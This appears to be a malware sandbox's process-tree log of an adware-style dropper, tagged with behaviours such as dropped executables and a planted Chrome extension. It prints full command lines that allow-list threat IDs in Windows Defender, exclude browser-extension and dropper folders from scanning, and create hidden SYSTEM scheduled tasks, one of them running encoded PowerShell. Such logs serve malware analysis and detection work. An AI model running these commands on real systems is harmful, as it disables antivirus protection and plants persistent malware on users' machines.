C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bjzvzwrptCEFdBfgJx" /SC once /ST 23:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\AsrnguO.exe\" Fi /Wgsite_idydi 385118 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3124
-
-
-
C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\AsrnguO.exeC:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\AsrnguO.exe Fi /Wgsite_idydi 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4644 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:3856 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4112
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:2404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:1744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:3396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:3632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:2096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:3184
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:1212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:2132
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:1536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:1968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:3664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4916
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AhrcuswkDyIWnALCLrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AhrcuswkDyIWnALCLrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OiJitsNRDAtU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OiJitsNRDAtU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\atUnoJEcU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\atUnoJEcU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bHChqWbaifmeC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bHChqWbaifmeC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tYlulnlhfvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tYlulnlhfvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hdPjkOXNzukcsjVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hdPjkOXNzukcsjVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HbtuuClNkkkdGbCN\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HbtuuClNkkkdGbCN\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4708 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:323⤵PID:3300
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:324⤵PID:4820
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:643⤵PID:1828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiJitsNRDAtU2" /t REG_DWORD /d 0 /reg:323⤵PID:4336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiJitsNRDAtU2" /t REG_DWORD /d 0 /reg:643⤵PID:1924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\atUnoJEcU" /t REG_DWORD /d 0 /reg:323⤵PID:1476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\atUnoJEcU" /t REG_DWORD /d 0 /reg:643⤵PID:2900
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHChqWbaifmeC" /t REG_DWORD /d 0 /reg:323⤵PID:4196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHChqWbaifmeC" /t REG_DWORD /d 0 /reg:643⤵PID:4900
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tYlulnlhfvUn" /t REG_DWORD /d 0 /reg:323⤵PID:4960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tYlulnlhfvUn" /t REG_DWORD /d 0 /reg:643⤵PID:980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hdPjkOXNzukcsjVB /t REG_DWORD /d 0 /reg:323⤵PID:3124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hdPjkOXNzukcsjVB /t REG_DWORD /d 0 /reg:643⤵PID:5056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:5004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:1208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga /t REG_DWORD /d 0 /reg:323⤵PID:4848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga /t REG_DWORD /d 0 /reg:643⤵PID:5048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HbtuuClNkkkdGbCN /t REG_DWORD /d 0 /reg:323⤵PID:4404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HbtuuClNkkkdGbCN /t REG_DWORD /d 0 /reg:643⤵PID:2804
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gqGXyUtcu" /SC once /ST 06:42:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:1532
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gqGXyUtcu"2⤵PID:3236
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gqGXyUtcu"2⤵PID:3536
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "eKTzntQiDjkvtKkfQ" /SC once /ST 11:15:55 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe\" qB /Zgsite_idObI 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1220
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "eKTzntQiDjkvtKkfQ"2⤵PID:1232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4432 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4464
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2856
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4956
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4488
-
C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exeC:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe qB /Zgsite_idObI 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3912 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bjzvzwrptCEFdBfgJx"2⤵PID:3772
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:4900
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:1420
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:1368
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4016 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4460
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\atUnoJEcU\wUHcGx.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "azeUktJAaUwkEYH" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2320
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "azeUktJAaUwkEYH2" /F /xml "C:\Program Files (x86)\atUnoJEcU\WXvLvkq.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4136
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "azeUktJAaUwkEYH"2⤵PID:1656
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "azeUktJAaUwkEYH"2⤵PID:3716
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OSQnjExwMsDOMr" /F /xml "C:\Program Files (x86)\OiJitsNRDAtU2\YqdZEqY.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4436
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KAxEQLlfNMoXA2" /F /xml "C:\ProgramData\hdPjkOXNzukcsjVB\cntsWEX.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4664
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KELEMENFVUYfdfdjp2" /F /xml "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR\vFIWIzm.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4112
-
-
